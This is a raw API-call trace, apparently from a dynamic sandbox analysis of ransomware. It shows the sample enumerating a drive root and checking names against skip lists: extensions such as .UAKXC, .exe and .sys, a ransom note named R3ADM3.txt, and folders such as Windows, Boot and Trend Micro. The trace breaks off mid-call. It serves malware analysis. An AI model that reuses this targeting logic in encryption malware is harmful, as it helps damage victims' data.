lpFindFileData=0x6fbfd08*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0134.788] lstrcmpW (lpString1="bootmgr", lpString2=".") returned 1 [0134.788] lstrcmpW (lpString1="bootmgr", lpString2="..") returned 1 [0134.788] StrStrIW (lpFirst="bootmgr", lpSrch=".UAKXC") returned 0x0 [0134.788] StrStrIW (lpFirst="bootmgr", lpSrch=".exe") returned 0x0 [0134.788] StrStrIW (lpFirst="bootmgr", lpSrch=".dll") returned 0x0 [0134.788] StrStrIW (lpFirst="bootmgr", lpSrch=".lnk") returned 0x0 [0134.788] StrStrIW (lpFirst="bootmgr", lpSrch=".sys") returned 0x0 [0134.789] StrStrIW (lpFirst="bootmgr", lpSrch=".msi") returned 0x0 [0134.789] StrStrIW (lpFirst="bootmgr", lpSrch="R3ADM3.txt") returned 0x0 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8910 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8758 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec86e0 [0134.789] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8910 | out: hHeap=0xea0000) returned 1 [0134.789] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.789] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0134.789] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0134.789] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".UAKXC") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".exe") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".dll") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".lnk") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".sys") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch=".msi") returned 0x0 [0134.789] StrStrIW (lpFirst="BOOTSECT.BAK", lpSrch="R3ADM3.txt") returned 0x0 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8910 [0134.789] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8960 [0134.789] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8988 [0134.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8910 | out: hHeap=0xea0000) returned 1 [0134.790] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0134.790] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0134.790] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="tmp") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="winnt") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="temp") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="thumb") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="$Recycle.Bin") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="System Volume Information") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="Boot") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="Windows") returned 0x0 [0134.790] StrStrIW (lpFirst="Config.Msi", lpSrch="Trend Micro") returned 0x0 [0134.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8910 [0134.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8910 | out: hHeap=0xea0000) returned 1 [0134.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8910 [0134.790] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec87d0 [0134.790] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.790] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0134.790] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0134.790] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0134.790] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0134.791] lstrcmpW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0134.791] lstrcmpW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0134.791] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".UAKXC") returned 0x0 [0134.791] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".exe") returned 0x0 [0134.791] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".dll") returned 0x0 [0134.791] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".lnk") returned 0x0 [0134.791] StrStrIW (lpFirst="hiberfil.sys", lpSrch=".sys") returned=".sys" [0134.791] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0134.791] lstrcmpW (lpString1="MSOCache", lpString2=".") returned 1 [0134.791] lstrcmpW (lpString1="MSOCache", lpString2="..") returned 1 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="tmp") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="winnt") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="temp") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="thumb") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="$Recycle.Bin") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="System Volume Information") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="Boot") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="Windows") returned 0x0 [0134.791] StrStrIW (lpFirst="MSOCache", lpSrch="Trend Micro") returned 0x0 [0134.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0134.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec8a28 | out: hHeap=0xea0000) returned 1 [0134.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xec8a28 [0134.791] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2bf8 [0134.791] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0134.791] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x397854f0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0134.791] lstrcmpW (lpString1="pagefile.sys", lpString2=".") returned 1 [0134.792] lstrcmpW (lpString1="pagefile.sys", lpString2="..") returned 1 [0134.792] StrStrIW (lpFirst="pagefile.sys", lpSrch=".UAKXC") returned 0x0 [0134.792] StrStrIW (lpFirst="pagefile.sys", lpSrch=".exe") returned 0x0 [0134.792] StrStrIW (lpFirst="pagefile.sys", lpSrch=".dll") returned 0x0 [0134.792] StrStrIW (lpFirst="pagefile.sys", lpSrch=".lnk") returned 0x0 [0134.792] StrStrIW (lpFirst="pagefile.sys", lpSrch=".sys") returned=".sys" [0134.792] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0134.792] lstrcmpW (lpString1="PerfLogs", lpString2=".") returned 1 [0134.792] lstrcmpW (lpString1="PerfLogs", lpString2="..") returned 1 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="tmp") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="winnt") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="temp") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="thumb") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="$Recycle.Bin") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="System Volume Information") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="Boot") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="Windows") returned 0x0 [0134.792] StrStrIW (lpFirst="PerfLogs", lpSrch="Trend Micro") returned 0x0 [0134.792] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0134.792] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ba8 [0134.792] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0134.792] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0134.792] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0134.792] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ba8 | out: hHeap=0xea0000) returned 1 [0134.792] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe319ffa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe319ffa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0134.792] lstrcmpW (lpString1="Program Files", lpString2=".") returned 1 [0134.792] lstrcmpW (lpString1="Program Files", lpString2="..") returned 1 [0134.792] StrStrIW (lpFirst="Program Files", lpSrch="tmp") returned 0x0 [0134.792] StrStrIW (lpFirst="Program Files", lpSrch="winnt") returned 0x0 [0134.792] StrStrIW (lpFirst="Program Files", lpSrch="temp") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="thumb") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="$Recycle.Bin") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="System Volume Information") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="Boot") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="Windows") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files", lpSrch="Trend Micro") returned 0x0 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ba8 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0134.793] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ba8 | out: hHeap=0xea0000) returned 1 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ba8 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3e78 [0134.793] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0134.793] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0134.793] lstrcmpW (lpString1="Program Files (x86)", lpString2=".") returned 1 [0134.793] lstrcmpW (lpString1="Program Files (x86)", lpString2="..") returned 1 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="tmp") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="winnt") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="temp") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="thumb") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="$Recycle.Bin") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="System Volume Information") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="Boot") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="Windows") returned 0x0 [0134.793] StrStrIW (lpFirst="Program Files (x86)", lpSrch="Trend Micro") returned 0x0 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3eb0 [0134.793] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d38 [0134.793] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0134.794] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3eb0 | out: hHeap=0xea0000) returned 1 [0134.794] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0134.794] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0134.794] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="tmp") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="winnt") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="temp") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="thumb") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="$Recycle.Bin") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="System Volume Information") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="Boot") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="Windows") returned 0x0 [0134.794] StrStrIW (lpFirst="ProgramData", lpSrch="Trend Micro") returned 0x0 [0134.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d60 [0134.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d88 [0134.794] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d60 | out: hHeap=0xea0000) returned 1 [0134.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d60 [0134.794] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2db0 [0134.794] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d88 | out: hHeap=0xea0000) returned 1 [0134.794] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57136ef0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x57136ef0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5715d050, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0134.794] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0134.794] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0134.794] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0134.794] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0134.795] lstrcmpW (lpString1="Recovery", lpString2=".") returned 1 [0134.795] lstrcmpW (lpString1="Recovery", lpString2="..") returned 1 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="tmp") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="winnt") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="temp") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="thumb") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="$Recycle.Bin") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="System Volume Information") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="Boot") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="Windows") returned 0x0 [0134.795] StrStrIW (lpFirst="Recovery", lpSrch="Trend Micro") returned 0x0 [0134.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d88 [0134.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0134.795] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d88 | out: hHeap=0xea0000) returned 1 [0134.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d88 [0134.795] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2e00 [0134.795] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2dd8 | out: hHeap=0xea0000) returned 1 [0134.795] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0134.795] lstrcmpW (lpString1="System Volume Information", lpString2=".") returned 1 [0134.795] lstrcmpW (lpString1="System Volume Information", lpString2="..") returned 1 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="tmp") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="winnt") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="temp") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="thumb") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="$Recycle.Bin") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="$RECYCLE.BIN") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch="System Volume Information") returned="System Volume Information" [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch=".UAKXC") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch=".exe") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch=".dll") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch=".lnk") returned 0x0 [0134.795] StrStrIW (lpFirst="System Volume Information", lpSrch=".sys") returned 0x0 [0134.796] StrStrIW (lpFirst="System Volume Information", lpSrch=".msi") returned 0x0 [0134.796] StrStrIW (lpFirst="System Volume Information", lpSrch="R3ADM3.txt") returned 0x0 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc4b0 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc468 [0134.796] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc4b0 | out: hHeap=0xea0000) returned 1 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc4b0 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0134.796] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0134.796] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc4b0 | out: hHeap=0xea0000) returned 1 [0134.796] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc468 | out: hHeap=0xea0000) returned 1 [0134.796] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0134.796] lstrcmpW (lpString1="Users", lpString2=".") returned 1 [0134.796] lstrcmpW (lpString1="Users", lpString2="..") returned 1 [0134.796] StrStrIW (lpFirst="Users", lpSrch="tmp") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="winnt") returned 0x0 [0134.796] StrStrIW (lpFirst="Users", lpSrch="temp") returned 0x0 [0134.796] StrStrIW 